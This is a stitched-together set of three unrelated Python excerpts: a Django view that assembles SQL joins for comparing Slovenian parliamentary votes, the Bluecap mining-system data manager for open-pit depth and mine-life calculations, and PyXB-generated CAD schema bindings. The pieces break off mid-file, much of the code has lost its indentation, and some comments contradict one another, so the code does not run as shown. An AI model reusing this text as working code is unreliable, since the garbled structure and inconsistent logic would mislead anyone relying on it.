"text": "Zakon o spremembah in dopolnitvah Zakona o pokojninskem in invalidskem zavarovanju - Eviden\u010dni sklep o primernosti predloga zakona 30.5.2017",
"tags": ["Odbor za delo, dru\u017eino, socialne zadeve in invalide"],
"is_outlier": false,
"not_present": 13,
"votes_for": 24,
"result": false
}
}]
}
"""
people_same = request.GET.get('people_same')
parties_same = request.GET.get('parties_same')
people_different = request.GET.get('people_different')
parties_different = request.GET.get('parties_different')
if people_same != '':
people_same_list = people_same.split(',')
else:
people_same_list = []
if parties_same != '':
parties_same_list = parties_same.split(',')
else:
parties_same_list = []
if people_different != '':
people_different_list = people_different.split(',')
else:
people_different_list = []
if parties_different != '':
parties_different_list = parties_different.split(',')
else:
parties_different_list = []
if len(people_same_list) + len(parties_same_list) == 0:
return HttpResponse('Need at least one same to compare.')
if len(people_same_list) + len(parties_same_list) < 2 and len(people_different_list) + len(parties_different_list) < 1:
return HttpResponse('Not enough to compare.')
beginning = 'SELECT * FROM '
select_same_people = ''
select_same_parties = ''
match_same_people_ballots = ''
match_same_people_persons = ''
match_same_people_options = ''
match_same_parties_ballots = ''
match_same_parties_organizations = ''
match_same_parties_options = ''
select_different_people = ''
select_different_parties = ''
match_different_people_ballots = ''
match_different_people_persons = ''
match_different_people_options = ''
match_different_parties_ballots = ''
match_different_parties_organizations = ''
match_different_parties_options = ''
# select for same people DONE
for i, e in enumerate(people_same_list):
if i < len(people_same_list) - 1:
select_same_people = '%s parlaseje_ballot b%s, parlaseje_activity a%s, parlaposlanci_person p%s, ' % (select_same_people, str(i), str(i), str(i))
else:
select_same_people = '%s parlaseje_ballot b%s, parlaseje_activity a%s, parlaposlanci_person p%s' % (select_same_people, str(i), str(i), str(i))
# select for same parties DONE
for i, e in enumerate(parties_same_list):
if i < len(parties_same_list) - 1:
select_same_parties = '%s parlaseje_ballot pb%s, parlaskupine_organization o%s, ' % (select_same_parties, str(i), str(i))
else:
select_same_parties = '%s parlaseje_ballot pb%s, parlaskupine_organization o%s' % (select_same_parties, str(i), str(i))
# select for different people DONE
for i, e in enumerate(people_different_list):
if i < len(people_different_list) - 1:
select_different_people = '%s parlaseje_ballot db%s, parlaseje_activity da%s, parlaposlanci_person dp%s, ' % (select_different_people, str(i), str(i), str(i))
else:
select_different_people = '%s parlaseje_ballot db%s, parlaseje_activity da%s, parlaposlanci_person dp%s' % (select_different_people, str(i), str(i), str(i))
# select for different parties DONE
for i, e in enumerate(parties_different_list):
if i < len(parties_different_list) - 1:
select_different_parties = '%s parlaseje_ballot dpb%s, parlaskupine_organization do%s, ' % (select_different_parties, str(i), str(i))
else:
select_different_parties = '%s parlaseje_ballot dpb%s, parlaskupine_organization do%s' % (select_different_parties, str(i), str(i))
# match same people ballots by vote id DONE
# if only one person was passed, match_same_people_ballots will remain an empty string
for i, e in enumerate(people_same_list):
if i != 0:
if i < len(people_same_list) - 1:
match_same_people_ballots = '%s b0.vote_id = b%s.vote_id AND ' % (match_same_people_ballots, str(i))
else:
match_same_people_ballots = '%s b0.vote_id = b%s.vote_id' % (match_same_people_ballots, str(i))
# match same parties ballots by vote id DONE
# if only one same party was passed match_same_parties_ballots will remain an empty string
if len(people_same_list) == 0:
# no same people were passed to the API
pass
if len(parties_same_list) == 0:
# no same parties were passed
return HttpResponse('You need to pass at least one "same" person or party.')
elif len(parties_same_list) == 1:
# only one same party was passed, there is nothing to match yet
match_same_parties_ballots = ''
else:
# more than one same party was passed
for i, e in enumerate(parties_same_list):
if i != 0:
# ignore the first one, because all others will be compared with it
if i < len(parties_same_list) - 1:
# not last
match_same_parties_ballots = '%s pb0.vote_id = pb%s.vote_id AND ' % (match_same_parties_ballots, str(i))
else:
# last
match_same_parties_ballots = '%s pb0.vote_id = pb%s.vote_id' % (match_same_parties_ballots, str(i))
elif len(people_same_list) > 0:
# one or more same people were passed
for i, e in enumerate(parties_same_list):
# do not ignore the first one, because all will be compared to the first person ballot
if i < len(parties_same_list) - 1:
# not last
match_same_parties_ballots = '%s b0.vote_id = pb%s.vote_id AND ' % (match_same_parties_ballots, str(i))
else:
# last
match_same_parties_ballots = '%s b0.vote_id = pb%s.vote_id' % (match_same_parties_ballots, str(i))
# match same people with | |
<reponame>bluetyson/bluecap<filename>bluecappy3/Managers/MiningSystemDataManager.py
"""
Copyright (C) 2019, Monash University, Geoscience Australia
Copyright (C) 2018, <NAME>
Bluecap is released under the Apache License, Version 2.0 (the "License");
you may not use this software except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
The project uses third party components which may have different licenses.
Please refer to individual components for more details.
"""
import numpy as np
from scipy.optimize import brentq

# Common
from Common.Common import Todo
# IO
# HasAttribute added: ParseXMLNode calls it but it was never imported (NameError).
from IO.XML import HasChild, GetChild, AddChild, HasAttribute
from IO.XML import GetAttributeString, GetAttributeValue, SetAttributeString
#Units
from Units.UnitManager import UnitManager
#Functions
from Functions.FunctionManager import FunctionManager
class MiningSystemDataManager():
"""
This class holds information representing the mining system.
Note it is a subset of the Mine data manager, which holds information about the mining operation, processing/milling and infrastructure.
"""
def __init__(self):
"""
Create an empty mining system data manager and default variables.
"""
self.miningMethod = ""
self.mineLife = 0
self.mineCapacity = 0.0
self.mineOreProductionCapacity = 0.0
self.orebodyMass = 0.0
self.oreMined = np.array([0.0])
self.dilution = 0.05
self.wasteMined = np.array([0.0])
self.miningCapex = np.array([0.0])
self.miningOpex = np.array([0.0])
self.depths = np.array([0.0])
self.rampGrade = 0.1
self.alpha = 40*np.pi/180 # pit slope angle
self.mineStartupTime = 0 # in years
self.actualMineStartupTime = 0.0
self.miningMethod = "OC"
theUnitManager = UnitManager()
self.ugHaulCostPerDepth = theUnitManager.ConvertToBaseUnits("0.0073 AUD/tonne/m")
    def ParseXMLNode(self, miningSystemNode):
        """
        Generate mining system data from xml tree node.
        - Note this may not be needed in many cases as the mining system is derived from the orebody shape

        Returns the node unchanged so callers can continue processing it.
        """
        # Optional override of the pit slope angle (radians; default set in __init__).
        # NOTE(review): HasAttribute is not among this file's visible IO.XML
        # imports — confirm it is imported, otherwise this line raises NameError
        # whenever an "alpha" attribute is present.
        if(HasAttribute(miningSystemNode,"alpha")):
            self.alpha = GetAttributeValue(miningSystemNode,"alpha")
        return miningSystemNode
def UpdateOpenPitDepth(self,w,l,d,excavatedVol,alpha):
cotAlpha = 1.0/np.tan(alpha)
func = lambda newD : w*l*(newD-d) + (w+l)*cotAlpha * (newD **2 - d**2) + np.pi/3 * cotAlpha**2 *(newD**3 - d**3) - excavatedVol
dmax = d+excavatedVol/float(w*l) # might be able to improve bound by using 2nd order terms
theNewD = brentq(func,d,dmax) # using current d as lower bound
return theNewD
    def UpdateSlopedOpenPitDepth(self,w,l,d,excavatedVol,alpha,beta):
        """
        Return the new pit depth after removing excavatedVol from a sloped open pit.

        w, l are the orebody footprint dimensions, d the current depth, alpha the
        pit slope angle (radians) and beta a second slope angle — presumably the
        dip-side face of the pit; TODO confirm the geometry convention.
        """
        cotAlpha = 1.0/np.tan(alpha)
        cotBeta = 1.0/np.tan(beta)
        # Analytic volume between depths d and newD minus excavatedVol; its root
        # is the new pit depth.
        func = lambda newD : w*l*newD - (w-(cotBeta-cotAlpha)*(newD-d))*l*d\
               + (w+0.5*l)*cotAlpha * newD **2 - (0.5*l+w-(cotBeta-cotAlpha)*(newD-d))*cotAlpha*d**2 \
               + np.pi/6 * cotAlpha**2 *(newD**3 - d**3) - excavatedVol
        dmax = d+excavatedVol/float(w*l) # upper bound from vertical-walled estimate; might improve by using 2nd order
        theNewD = brentq(func,d,dmax)  # current depth d is the lower bound
        return theNewD
def UpdateOpenPitDepthAndOreFraction(self,w,l,d,excavatedVol,alpha):
dd = self.UpdateOpenPitDepth(w,l,d,excavatedVol,alpha)
oreFraction = (dd-d)*w*l/excavatedVol
return dd,oreFraction
def UpdateSlopedOpenPitDepthAndOreFraction(self,w,l,d,excavatedVol,alpha,beta):
dd = self.UpdateSlopedOpenPitDepth(w,l,d,excavatedVol,alpha,beta)
oreFraction = (dd-d)*w*l/excavatedVol
return dd,oreFraction
###
def OpenPitExcavatedVolume(self,w,l,d,newD,alpha):
"""
Excavated volume between depths d and newD for an open pit with an orebody of width w, length l and pit slope alpha
"""
cotAlpha = 1.0/np.tan(alpha)
excavatedVolume = w*l*(newD-d) + (w+l)*cotAlpha * (newD **2 - d**2) + np.pi/3 * cotAlpha**2 *(newD**3 - d**3)
return excavatedVolume
def OpenPitOreFraction(self,w,l,d,newD,alpha):
"""
Fraction of ore excavated between depths d and newD for an open pit with an orebody of width w, length l and pit slope alpha
"""
orefrac = w*l*(newD-d)/(self.OpenPitExcavatedVolume(w,l,d,newD,alpha)+1e-64)
return orefrac
def OpenPitMarginalOreFraction(self,w,l,newD,alpha):
"""
Fraction of ore excavated at depth newD for an open pit with an orebody of width w, length l and pit slope alpha
"""
cotAlpha = 1.0/np.tan(alpha)
borderWidth = newD*cotAlpha
excavatedArea = w*l + (w+l)*borderWidth + np.pi * borderWidth**2
orefrac = w*l/excavatedArea
return orefrac
def RequiredTotalCapacity(self,oreProductionRate, w,l,d,newD,alpha):
"""
Mining capacity (total material moved) to maintain a given ore production rate between depths d and newd for an open pit with an orebody of width w, length l and pit slope alpha
"""
oreFrac = self.OpenPitOreFraction(w,l,d,newD,alpha)
totalCapacity = oreProductionRate/(oreFrac + 1e-64)
return totalCapacity
def MarginalCostAtDepthPerUnitOre(self,costAtDepthPerUnitMaterial, w,l,newD,alpha):
"""
Marginal cost per unit ore at depth newd for an open pit with an orebody of width w, length l and pit slope alpha
"""
marginalOreFrac = self.OpenPitMarginalOreFraction(w,l,newD,alpha)
costAtDepthPerUnitOre = costAtDepthPerUnitMaterial/(marginalOreFrac + 1e-64)
return costAtDepthPerUnitOre
def FindOPMarginalOreCostAtDepth(self,oreProductionRate, w,l,d,newD,alpha,materialCostFunc ):
"""
Find marginal cost at depth per unit ore from a material cost function based on the mine capacity in terms of total material mined
"""
totalCapacity = self.RequiredTotalCapacity(oreProductionRate, w,l,d,newD,alpha)
theUnitManager = UnitManager()
costAtDepthPerUnitMaterial = materialCostFunc.f([totalCapacity *theUnitManager.ConvertTo("1e6 tonne") ])
marginalcostAtDepth = self.MarginalCostAtDepthPerUnitOre(costAtDepthPerUnitMaterial, w,l,newD,alpha)
return marginalcostAtDepth
def FindOpUgSwitchingDepth(self,oreProductionRate, w,l,d,maxD,alpha,materialCostFunc,ugMaterialCost, ugMaterialCostPerTonMDepth ):
"""
Find switching depth between an open pit and underground mine
"""
func = lambda newD : ugMaterialCost + ugMaterialCostPerTonMDepth*(newD-60) - self.FindOPMarginalOreCostAtDepth(oreProductionRate, w,l,d,newD,alpha,materialCostFunc )
theSwitchingDepth = maxD
if func(theSwitchingDepth) < 0:
theSwitchingDepth = brentq(func,d,maxD)
return theSwitchingDepth
###
###
    def DetermineMiningSystem(self, problemManager, mineManager):
        """
        Use available data to determine the most likely mining method/capacity/opex etc.

        If self.miningMethod is "UG", refines it to a specific underground
        method code (UG_RP/UG_CF/UG_BC/UG_ST) from the orebody geometry, then
        runs the capacity/life/ore/capex/opex calculations. Returns self.
        """
        # Orebody classification thresholds (angles in radians, widths in base units).
        flatPlunge = 20 * np.pi/180.
        steepPlunge = 55 * np.pi/180.
        theUnitManager =  UnitManager()
        narrowWidth = theUnitManager.ConvertToBaseUnits("10m")
        thickWidth = theUnitManager.ConvertToBaseUnits("30m")
        # Thick > 30 m
        # Intermediate 10-30m
        # Narrow < 10 m
        # Plunge
        # Flat < 20 degrees
        # Intermediate 20-55 degrees
        # Steep > 55 degrees
        doUnderground = self.miningMethod == "UG"
        print("doUnderground", doUnderground)
        print("mineManager.theOreBody.dip", mineManager.theOreBody.dip)
        if (doUnderground):
            # Underground method selection based on dip/width/height.
            if (mineManager.theOreBody.dip < flatPlunge ):   # see selection process for hard rock mining by Carter
                self.miningMethod = "UG_RP"
                # Room and pilar
                # "Typically flat and tabular"
            elif (mineManager.theOreBody.width < narrowWidth ):
                # Cut and fill
                self.miningMethod = "UG_CF"
            elif (mineManager.theOreBody.dip > steepPlunge and mineManager.theOreBody.width > thickWidth and mineManager.theOreBody.height > mineManager.theOreBody.width ):
                # Block cave
                self.miningMethod = "UG_BC"
            else:
                # Stoping
                self.miningMethod = "UG_ST"
        # Derive the economics of the chosen method.
        self.CalculateMineCapacity(problemManager, mineManager)
        self.CalculateMineLife(mineManager)
        self.CalculateOreMined(mineManager)
        self.CalculateMiningCapex(mineManager)
        self.CalculateMiningOpex(mineManager)
        return self
def CalculateMineCapacity(self,problemManager, mineManager):
    """
    Determine the maximum annual extraction for the mine using Taylor's rule.

    Evaluates the Taylor's-rule curve registered for the selected mining
    method at the deposit mass (in tonnes), scaled by the assumed number of
    operating days per year.  Sets self.mineCapacity and
    self.mineOreProductionCapacity and returns the capacity (base units/year).
    """
    unitManager = UnitManager()
    depositMassTonnes = mineManager.theOreBody.CalculateDepositMass() * unitManager.ConvertTo("tonne")
    functionManager = FunctionManager()

    # for the combined "OCUG" method use the open-cut curve ("OCUG"[:2] == "OC")
    ruleName = "TaylorsRule_" + (self.miningMethod[:2] if self.miningMethod == "OCUG" else self.miningMethod)
    taylorsRuleFunc = functionManager.GetFunction(ruleName)

    daysPerYear = 350  # assumed operating days per year
    self.mineCapacity = daysPerYear * taylorsRuleFunc.f([depositMassTonnes]) * unitManager.ConvertToBaseUnits("tonne")
    self.mineOreProductionCapacity = self.mineCapacity
    print("Mine ore capacity from Taylor's rule in Mt/year", self.mineCapacity * unitManager.ConvertTo("1e6 tonne"))
    return self.mineCapacity
def CalculateMineLife(self, mineManager):
    """
    Determine the life of the mine in whole years (production plus startup)
    and allocate the per-year accounting arrays.
    """
    orebody = mineManager.theOreBody

    # production years: deposit mass over annual ore capacity, rounded up.
    # The 1e-64 guards against division by zero; ramp-up/ramp-down are not modelled.
    self.orebodyMass = orebody.CalculateDepositMass()
    self.mineLife = int(np.ceil(self.orebodyMass / (self.mineOreProductionCapacity + 1e-64)))

    theUnitManager = UnitManager()
    massInTonnes = orebody.CalculateDepositMass() * theUnitManager.ConvertTo("tonne")
    print("orebodyMass in 1e6 tonne", massInTonnes / 1e6)

    # pre-production excavation: an underground decline ramp (25 m^2 section)
    # through the cover at the configured ramp grade ...
    declineLength = orebody.cover * (1. + 1. / self.rampGrade ** 2) ** 0.5
    preProductionVolume = 25 * theUnitManager.ConvertToBaseUnits("m^2") * declineLength
    if self.miningMethod[:2] == "OC":
        # ... or, for open cut, the pit volume excavated down to the orebody
        preProductionVolume = self.OpenPitExcavatedVolume(orebody.width, orebody.length, 0, orebody.cover, self.alpha)

    overburdenDensity = orebody.specificDensity * 1000 * theUnitManager.ConvertToBaseUnits("kg/m^3")
    self.actualMineStartupTime = (overburdenDensity * preProductionVolume) / (self.mineCapacity + 1e-64)
    self.mineStartupTime = np.max([int(np.ceil(self.actualMineStartupTime)), 1])  # at least one year
    self.mineLife += self.mineStartupTime

    # per-year accounting arrays sized to the full mine life
    self.miningCapex = np.zeros(self.mineLife)
    self.miningOpex = np.zeros(self.mineLife)
    self.depths = np.zeros(self.mineLife)
    print("mineLife", self.mineLife)
    print("mineStartupTime", self.mineStartupTime)
    return self.mineLife
def CalculateOreMined(self, mineManager):
self.materialMined = np.zeros(self.mineLife)
self.oreMined = np.zeros(self.mineLife)
self.wasteMined = np.zeros(self.mineLife)
self.depths = np.zeros(self.mineLife)
if(self.actualMineStartupTime > 1):
tt = int( np.floor( self.actualMineStartupTime ) )
self.materialMined[:tt-1] =self.mineCapacity
self.materialMined[tt-1] =self.mineCapacity*(self.actualMineStartupTime-tt)
else:
self.materialMined[0] =self.mineCapacity*self.actualMineStartupTime
self.materialMined[self.mineStartupTime:-1] = self.mineCapacity # constant in all years but last
self.materialMined[-1] = self.orebodyMass - self.mineCapacity*(self.mineLife-self.mineStartupTime-1) # remainder in last year
# assuming all material mined is ore in underground mines
if(self.miningMethod[:2] == "OC" ): # open cut
self.oreMined = np.array(self.materialMined)
self.oreMined[:self.mineStartupTime] = 0.0
#self.wasteMined = (1 - oreFraction)*self.oreMined
#self.oreMined *= oreFraction
theUnitManager = UnitManager()
theFunctionManager = FunctionManager()
ugMiningOpexFunc = theFunctionManager.GetFunction("MiningOpex_UG_ST") # underground stoping assumed as alternative mining method
ugOpexPerTonne = ugMiningOpexFunc.f( [self.mineCapacity *theUnitManager.ConvertTo("1e6 tonne")] )
ugOpexPerTonneMDepth = self.ugHaulCostPerDepth*theUnitManager.ConvertTo("AUD/tonne/m")
ocMiningOpexFunc = theFunctionManager.GetFunction("MiningOpex_OC")
oreProductionRate = self.mineOreProductionCapacity # taylor's rule gives average ore produced not total material
minD = mineManager.theOreBody.cover
maxD = mineManager.theOreBody.cover + mineManager.theOreBody.height
w = mineManager.theOreBody.length
l = mineManager.theOreBody.width
alpha = self.alpha
| |
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute ReferredPoint uses Python identifier ReferredPoint
__ReferredPoint = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'ReferredPoint'), 'ReferredPoint', '__cad_PointReference__ReferredPoint', STD_ANON_)
__ReferredPoint._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 179, 4)
__ReferredPoint._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 179, 4)
ReferredPoint = property(__ReferredPoint.value, __ReferredPoint.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__ReferredPoint.name() : __ReferredPoint
})
Namespace.addCategoryObject('typeBinding', u'PointReference', PointReference_)
# Complex type {cad}PlaneReference with content type EMPTY
# NOTE: PyXB-generated binding class; regenerate from avm.cad.xsd rather than editing by hand.
class PlaneReference_ (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {cad}PlaneReference with content type EMPTY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'PlaneReference')
    _XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 208, 2)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute ReferredPlane uses Python identifier ReferredPlane
    # ('__cad_PlaneReference__ReferredPlane' is PyXB's unique internal id for this attribute use)
    __ReferredPlane = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'ReferredPlane'), 'ReferredPlane', '__cad_PlaneReference__ReferredPlane', STD_ANON_2)
    __ReferredPlane._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 209, 4)
    __ReferredPlane._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 209, 4)
    ReferredPlane = property(__ReferredPlane.value, __ReferredPlane.set, None, None)
    _ElementMap.update({
    })
    _AttributeMap.update({
        __ReferredPlane.name() : __ReferredPlane
    })
Namespace.addCategoryObject('typeBinding', u'PlaneReference', PlaneReference_)
# Complex type {cad}GuideDatum with content type EMPTY
# NOTE: PyXB-generated binding class; regenerate from avm.cad.xsd rather than editing by hand.
class GuideDatum_ (_ImportedBinding__avm.ConnectorFeature_):
    """Complex type {cad}GuideDatum with content type EMPTY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'GuideDatum')
    _XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 215, 2)
    # copies of the base type's maps, so local declarations can be added without mutating the base
    _ElementMap = _ImportedBinding__avm.ConnectorFeature_._ElementMap.copy()
    _AttributeMap = _ImportedBinding__avm.ConnectorFeature_._AttributeMap.copy()
    # Base type is _ImportedBinding__avm.ConnectorFeature_
    # Attribute Datum uses Python identifier Datum (required anyURI)
    __Datum = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'Datum'), 'Datum', '__cad_GuideDatum__Datum', pyxb.binding.datatypes.anyURI, required=True)
    __Datum._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 218, 8)
    __Datum._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 218, 8)
    Datum = property(__Datum.value, __Datum.set, None, None)
    _ElementMap.update({
    })
    _AttributeMap.update({
        __Datum.name() : __Datum
    })
Namespace.addCategoryObject('typeBinding', u'GuideDatum', GuideDatum_)
# Complex type {cad}AssemblyRoot with content type EMPTY
# NOTE: PyXB-generated binding class; regenerate from avm.cad.xsd rather than editing by hand.
class AssemblyRoot_ (_ImportedBinding__avm.DesignDomainFeature_):
    """Complex type {cad}AssemblyRoot with content type EMPTY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'AssemblyRoot')
    _XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 230, 2)
    # copies of the base type's maps, so local declarations can be added without mutating the base
    _ElementMap = _ImportedBinding__avm.DesignDomainFeature_._ElementMap.copy()
    _AttributeMap = _ImportedBinding__avm.DesignDomainFeature_._AttributeMap.copy()
    # Base type is _ImportedBinding__avm.DesignDomainFeature_
    # Attribute AssemblyRootComponentInstance uses Python identifier AssemblyRootComponentInstance (required anyURI)
    __AssemblyRootComponentInstance = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'AssemblyRootComponentInstance'), 'AssemblyRootComponentInstance', '__cad_AssemblyRoot__AssemblyRootComponentInstance', pyxb.binding.datatypes.anyURI, required=True)
    __AssemblyRootComponentInstance._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 233, 8)
    __AssemblyRootComponentInstance._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 233, 8)
    AssemblyRootComponentInstance = property(__AssemblyRootComponentInstance.value, __AssemblyRootComponentInstance.set, None, None)
    _ElementMap.update({
    })
    _AttributeMap.update({
        __AssemblyRootComponentInstance.name() : __AssemblyRootComponentInstance
    })
Namespace.addCategoryObject('typeBinding', u'AssemblyRoot', AssemblyRoot_)
# Complex type {cad}KinematicJointSpec with content type EMPTY
# NOTE: PyXB-generated binding class; regenerate from avm.cad.xsd rather than editing by hand.
class KinematicJointSpec_ (_ImportedBinding__avm.ConnectorFeature_):
    """Complex type {cad}KinematicJointSpec with content type EMPTY"""
    # Abstract base type; concrete joints below are RevoluteJointSpec_ and TranslationalJointSpec_.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = True
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'KinematicJointSpec')
    _XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 237, 2)
    # copies of the base type's maps, so subclasses can extend without mutating the base
    _ElementMap = _ImportedBinding__avm.ConnectorFeature_._ElementMap.copy()
    _AttributeMap = _ImportedBinding__avm.ConnectorFeature_._AttributeMap.copy()
    # Base type is _ImportedBinding__avm.ConnectorFeature_
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
Namespace.addCategoryObject('typeBinding', u'KinematicJointSpec', KinematicJointSpec_)
# Complex type {cad}Geometry2D with content type EMPTY
# NOTE: PyXB-generated binding class; regenerate from avm.cad.xsd rather than editing by hand.
class Geometry2D_ (Geometry_):
    """Complex type {cad}Geometry2D with content type EMPTY"""
    # Abstract base for 2-D geometry bindings (e.g. Circle_, Polygon_); adds nothing to Geometry_.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = True
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'Geometry2D')
    _XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 106, 2)
    _ElementMap = Geometry_._ElementMap.copy()
    _AttributeMap = Geometry_._AttributeMap.copy()
    # Base type is Geometry_
    # Attribute GeometryQualifier inherited from {cad}Geometry
    # Attribute PartIntersectionModifier inherited from {cad}Geometry
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
Namespace.addCategoryObject('typeBinding', u'Geometry2D', Geometry2D_)
# Complex type {cad}Geometry3D with content type EMPTY
# NOTE: PyXB-generated binding class; regenerate from avm.cad.xsd rather than editing by hand.
class Geometry3D_ (Geometry_):
    """Complex type {cad}Geometry3D with content type EMPTY"""
    # Abstract base for 3-D geometry bindings; adds nothing to Geometry_.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = True
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'Geometry3D')
    _XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 111, 2)
    _ElementMap = Geometry_._ElementMap.copy()
    _AttributeMap = Geometry_._AttributeMap.copy()
    # Base type is Geometry_
    # Attribute GeometryQualifier inherited from {cad}Geometry
    # Attribute PartIntersectionModifier inherited from {cad}Geometry
    _ElementMap.update({
    })
    _AttributeMap.update({
    })
Namespace.addCategoryObject('typeBinding', u'Geometry3D', Geometry3D_)
# Complex type {cad}CustomGeometry with content type ELEMENT_ONLY
# NOTE: PyXB-generated binding class; regenerate from avm.cad.xsd rather than editing by hand.
class CustomGeometry_ (Geometry_):
    """Complex type {cad}CustomGeometry with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'CustomGeometry')
    _XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 156, 2)
    _ElementMap = Geometry_._ElementMap.copy()
    _AttributeMap = Geometry_._AttributeMap.copy()
    # Base type is Geometry_
    # Element CustomGeometryInput uses Python identifier CustomGeometryInput
    __CustomGeometryInput = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'CustomGeometryInput'), 'CustomGeometryInput', '__cad_CustomGeometry__CustomGeometryInput', True, pyxb.utils.utility.Location(u'avm.cad.xsd', 160, 10), )
    CustomGeometryInput = property(__CustomGeometryInput.value, __CustomGeometryInput.set, None, None)
    # Attribute GeometryQualifier inherited from {cad}Geometry
    # Attribute PartIntersectionModifier inherited from {cad}Geometry
    _ElementMap.update({
        __CustomGeometryInput.name() : __CustomGeometryInput
    })
    _AttributeMap.update({
    })
Namespace.addCategoryObject('typeBinding', u'CustomGeometry', CustomGeometry_)
# Complex type {cad}RevoluteJointSpec with content type ELEMENT_ONLY
# NOTE: PyXB-generated binding class; regenerate from avm.cad.xsd rather than editing by hand.
class RevoluteJointSpec_ (KinematicJointSpec_):
    """Complex type {cad}RevoluteJointSpec with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'RevoluteJointSpec')
    _XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 242, 2)
    _ElementMap = KinematicJointSpec_._ElementMap.copy()
    _AttributeMap = KinematicJointSpec_._AttributeMap.copy()
    # Base type is KinematicJointSpec_
    # Rotation limit elements (Minimum/Default/Maximum)
    # Element MinimumRotation uses Python identifier MinimumRotation
    __MinimumRotation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'MinimumRotation'), 'MinimumRotation', '__cad_RevoluteJointSpec__MinimumRotation', False, pyxb.utils.utility.Location(u'avm.cad.xsd', 246, 10), )
    MinimumRotation = property(__MinimumRotation.value, __MinimumRotation.set, None, None)
    # Element DefaultRotation uses Python identifier DefaultRotation
    __DefaultRotation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'DefaultRotation'), 'DefaultRotation', '__cad_RevoluteJointSpec__DefaultRotation', False, pyxb.utils.utility.Location(u'avm.cad.xsd', 247, 10), )
    DefaultRotation = property(__DefaultRotation.value, __DefaultRotation.set, None, None)
    # Element MaximumRotation uses Python identifier MaximumRotation
    __MaximumRotation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'MaximumRotation'), 'MaximumRotation', '__cad_RevoluteJointSpec__MaximumRotation', False, pyxb.utils.utility.Location(u'avm.cad.xsd', 248, 10), )
    MaximumRotation = property(__MaximumRotation.value, __MaximumRotation.set, None, None)
    # Attribute AlignmentPlane uses Python identifier AlignmentPlane (required anyURI)
    __AlignmentPlane = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'AlignmentPlane'), 'AlignmentPlane', '__cad_RevoluteJointSpec__AlignmentPlane', pyxb.binding.datatypes.anyURI, required=True)
    __AlignmentPlane._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 250, 8)
    __AlignmentPlane._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 250, 8)
    AlignmentPlane = property(__AlignmentPlane.value, __AlignmentPlane.set, None, None)
    # Attribute AlignmentAxis uses Python identifier AlignmentAxis (required anyURI)
    __AlignmentAxis = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'AlignmentAxis'), 'AlignmentAxis', '__cad_RevoluteJointSpec__AlignmentAxis', pyxb.binding.datatypes.anyURI, required=True)
    __AlignmentAxis._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 251, 8)
